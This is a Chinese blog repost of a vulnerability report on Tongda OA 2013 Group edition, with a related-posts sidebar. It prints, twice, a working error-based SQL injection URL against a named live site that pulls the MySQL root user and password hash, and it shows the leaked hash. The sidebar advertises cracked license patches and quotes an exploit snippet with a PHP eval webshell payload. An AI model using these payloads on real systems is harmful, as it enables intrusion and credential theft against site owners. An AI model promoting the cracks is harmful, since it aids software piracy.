通达oa 2013 php解密,通达OA2013集团版SQL注入+root

最新推荐文章于 2021-03-19 14:55:17 发布
最新推荐文章于 2021-03-19 14:55:17 发布
阅读量213 收藏
点赞数
文章标签: 通达oa 2013 php解密

### 简要描述:

dd

### 详细说明:

http://www.tongda2000.com/oa/group/

试用登录

http://www.day900.com/

注入点:

http://www.day900.com/general/workflow/list/getdata.php?TYPE=2&RUN_ID=&RUN_NAME=&FLOW_ID=all&TIME_OUT_FLAG=all&_search=false&nd=1427034012264&rows=10&page=1&sidx=PRCS_TIME&sord=,(select%201%20from%20(select%20count(*),concat((select%20concat(host,user,password)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23

返回:

请联系管理员

错误#1062: Duplicate entry 'localhostroot*91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key'

SQL语句: SELECT FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,FLOW_RUN.RUN_NAME,FLOW_RUN.BEGIN_USER,FLOW_RUN.END_TIME, FLOW_RUN_PRCS.ID AS PRCS_KEY_ID,FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN_PRCS.FLOW_PRCS,FLOW_RUN_PRCS.COMMENT,FLOW_RUN_PRCS.OP_FLAG, FLOW_RUN_PRCS.PRCS_FLAG,FLOW_RUN_PRCS.TIME_OUT_FLAG,FLOW_RUN_PRCS.PRCS_TIME, FLOW_RUN_PRCS.CREATE_TIME,FLOW_RUN_PRCS.DELIVER_TIME,FLOW_RUN_PRCS.TIME_OUT FROM FLOW_RUN_PRCS LEFT JOIN FLOW_RUN ON FLOW_RUN.RUN_ID = FLOW_RUN_PRCS.RUN_ID WHERE FLOW_RUN.DEL_FLAG='0' AND FLOW_RUN_PRCS.PRCS_FLAG = '2' AND FLOW_RUN_PRCS.CHILD_RUN='0' AND FLOW_RUN_PRCS.USER_ID='ghq' ORDER BY PRCS_TIME ,(select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# LIMIT 0, 10

文件:/general/workflow/list/getdata.php

### 漏洞证明:

注入点:

http://www.day900.com/general/workflow/list/getdata.php?TYPE=2&RUN_ID=&RUN_NAME=&FLOW_ID=all&TIME_OUT_FLAG=all&_search=false&nd=1427034012264&rows=10&page=1&sidx=PRCS_TIME&sord=,(select%201%20from%20(select%20count(*),concat((select%20concat(host,user,password)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23

返回:

请联系管理员

错误#1062: Duplicate entry 'localhostroot*91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key'

SQL语句: SELECT FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,FLOW_RUN.RUN_NAME,FLOW_RUN.BEGIN_USER,FLOW_RUN.END_TIME, FLOW_RUN_PRCS.ID AS PRCS_KEY_ID,FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN_PRCS.FLOW_PRCS,FLOW_RUN_PRCS.COMMENT,FLOW_RUN_PRCS.OP_FLAG, FLOW_RUN_PRCS.PRCS_FLAG,FLOW_RUN_PRCS.TIME_OUT_FLAG,FLOW_RUN_PRCS.PRCS_TIME, FLOW_RUN_PRCS.CREATE_TIME,FLOW_RUN_PRCS.DELIVER_TIME,FLOW_RUN_PRCS.TIME_OUT FROM FLOW_RUN_PRCS LEFT JOIN FLOW_RUN ON FLOW_RUN.RUN_ID = FLOW_RUN_PRCS.RUN_ID WHERE FLOW_RUN.DEL_FLAG='0' AND FLOW_RUN_PRCS.PRCS_FLAG = '2' AND FLOW_RUN_PRCS.CHILD_RUN='0' AND FLOW_RUN_PRCS.USER_ID='ghq' ORDER BY PRCS_TIME ,(select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# LIMIT 0, 10

文件:/general/workflow/list/getdata.php

loading-bars.svg

Mr.棱恩
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通达OA v11.9 getdata任意命令执行漏洞复现+利用
0xSec
03-21 5080
通达OA v11.9 getdata接口存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限。
通达OA2013增强最新破解注册工具
11-07
这是刚出来的,配合程序一起使用,一键破解通达OA2013增强,适用于20131030和20131104等后续本。
通达OA2013集团破解补丁
08-17
通达OA2013集团破解补丁,100%破解,与正一样,我花高价买的。
通达OA2013增强全部源码
06-19
通达OA2013增强的全部源码被反编译,意味着我们可以看到原本被编译成机器语言的代码以人类可读的形式呈现,这对于学习其内部工作原理、查找和修复bug、或是扩展新功能来说,提供了极大的便利。 通达OA的核心功能...
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
最新发布
09-07
通达OA漏洞合集
通达2013+破解+OA精灵+IM1000用户补丁01
03-26
绝对能用的通达OA2013+破解+OA精灵+IM1000用户补丁。 这是从麦枫和富阳上搜集的资料,汇总整合的。 现在好多破解都不提供原,以至于根本就不能用。本人经反复测试。这个绝对能用。 经过破解后,通达...
通达2013+破解+OA精灵+IM1000用户补丁03
03-25
绝对能用的通达OA2013+破解+OA精灵+IM1000用户补丁。 这是从麦枫和富阳上搜集的资料,汇总整合的。 现在好多破解都不提供原,以至于根本就不能用。本人经反复测试。这个绝对能用。 经过破解后,通达...
通达OA 2013 无限制修正破解补丁(2012.11.21)
11-21
修正[新建工作流]空白问题 (产生原因:inc\utility_html.php文件里if($TD_MYOA_COMPANY_NAME == _( "通达信科" )),而inc\td_core.php文件里实际给出的是$TD_MYOA_COMPANY_NAME = _( "通达科技" );) 整合Office_IM 1500授权本 修正pda、OA精灵不能正常登录问题 本软件仅供测试,请下载24后自行删除!
通达 oa 2010 php 源代码 解密
11-03
通达OA2010本,完整general目录下php文件无加密,示例: <?php /*********************/ /* */ /* Version : 5.1.0 */ /* Author : RM */ /* Comment : 071223 */ /* */ /*********************/ include_once( "inc/auth.php" ); if ( $LOGIN_THEME != "10" ) { $query = "SELECT * from INTERFACE"; $cursor = exequery( $connection, $query ); if ( $ROW = mysql_fetch_array( $cursor ) ) { $IE_TITLE = $ROW['IE_TITLE']; } echo "<html>\r\n<head>\r\n<title>"; echo $IE_TITLE; echo "</title>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\">\r\n[removed][removed]\r\n[removed]\r\nself.moveTo(0,0);\r\nself.resizeTo(screen.availWidth,screen.availHeight);\r\nself.focus();\r\n\r\nrelogin=0;\r\nfunction exit()\r\n{\r\n if(document.body.clientWidth-event.clientX<50||event.altKey||event.ctrlKey)\r\n {\r\n"; if ( $ISPIRIT == 1 ) { echo "return;"; } echo " var req = new_req();\r\n\treq.open(\"GET\", \"relogin.php\", true);\r\n\treq.send('');\r\n }\r\n}\r\n\r\n[removed]\r\n</head>\r\n"; include_once( "inc/antivirus.txt" ); echo "<frameset rows=\"50,*,20\" cols=\"*\" frameborder=\"no\" border=\"0\" framespacing=\"0\" id=\"frame1\" <frame name=\"banner\" id=\"banner\" scrolling=\"no\" noresize=\"noresize\" src=\"topbar.php\" frameborder=\"0\">\r\n <frameset rows=\"*\" cols=\"200,*\" frameborder=\"no\" border=\"0\" framespacing=\"0\" id=\"frame2\">\r\n <frame name=\"leftmenu\" id=\"leftmenu\" scrolling=\"no\" noresize=\"noresize\" src=\"ipanel\" frameborder=\"0\">\r\n <frame name=\"table_index\" id=\"table_index\" scrolling=\"no\" src=\"table.php\" frameborder=\"0\">\r\n </frameset>\r\n <frame name=\"status_bar\" id=\"status_bar\" scrolling=\"no\" noresize=\"noresize\" src=\"status_bar\" frameborder=\"0\">\r\n</frameset>\r\n</html>\r\n"; exit( ); } include_once( "inc/utility_all.php" ); include_once( "inc/td_core.php" ); include_once( "inc/chinese_date.php" ); include_once( "inc/sys_function_all.php" ); ob_end_clean( ); 本资源(仅供技术学习,权归原公司所有)
通达OA PHP的反编译器
01-14
通达OA PHP的反编译器 DEZEDER 自己测试过 很好用
通达OA 0day RCE漏洞复现
AzVoidSUN的博客
08-23 750
本次测试使用的是通达 OA V11.6本。 给出下载地址,http://www.kxdw.com/soft/23114.html 下载好后,直接安装就可以。 然后打开登录界面。 登录 文件有默认密码 用某大佬写的EXP import requests target="http://192.168.0.110/" payload="<?php eval($_POST['agan']);?>" print("[*]Warning,This exploit code will DELETE
通达oa 2013 php解密,通达OA漏洞学习 - 安全先师的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_39842937的博客
03-18 680
说明通达OA漏洞在去年上半年已爆出,这不趁着周末没事做,将源码下载下来进行复现学习。文件包含测试文件包含检测,payload1:ip/ispirit/interface/gateway.php?json={"url":"/general/../../mysql5/my.ini"}利用文件包含访问mysql.ini,检查是否有某些特定字符串 ,比如innodb_log_group_home_dir...
通达 php解密,全网首发 | 通达OA多枚0day漏洞分享
weixin_39702335的博客
03-19 849
之前曝光过通达OA 0day我这里就不曝了,截止到发帖时,下面的漏洞都是未正式公开的。影响范围:我测试的是通达OA11.5本,也就是2020年04月17日发布的,其他未测,但我想也会有吧。HW这几天看到大家对通达OA的热情度很高,正好今天有空,下载了一个通达OA 11.5本下来做代码审计,通达OA的代码是加密的,所以需要一个SeayDzend工具解密,百度上就能找到。解密后,对代码的各个模块...
通达OA远程命令执行漏洞利用复现(exp,getshell)
Beret-81的博客
07-07 4661
通达OA远程命令执行漏洞利用复现一、漏洞描述二、环境搭建三、影响本四、漏洞复现五、工具使用 一、漏洞描述 通达OA是由北京通达信科科技有限公司开发的一款办公系统,前一段时间通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击。 二、环境搭建 1、通达OA下载后,一键安装 下载地址:http://www.tongda2000.com/download/down.php
通达OA权限提升漏洞通告
爱国小白帽
04-22 1492
通达OA权限提升漏洞通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年04月22日, 360CERT监测发现 通达OA官方 发布了编号为 11.5.200417 的更新通告,此次更新修复了一枚权限提升漏洞,漏洞等级:高危。 通达OA是由北京通达信科科技有限公司研发的一款通用型OA产品,涵盖了个人事务、行政办公、流程审批、知识管...
通达OA2013增强与Discuz! X3.1集成指南
+X3.1与通达OA2013增强集成方法.pdf" 这篇文档主要介绍了如何将Discuz! X3.1论坛系统与通达OA2013增强办公自动化系统进行集成。通达OA2013是由中国兵器工业信息中心通达信科开发的一款网络智能办公软件,适用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值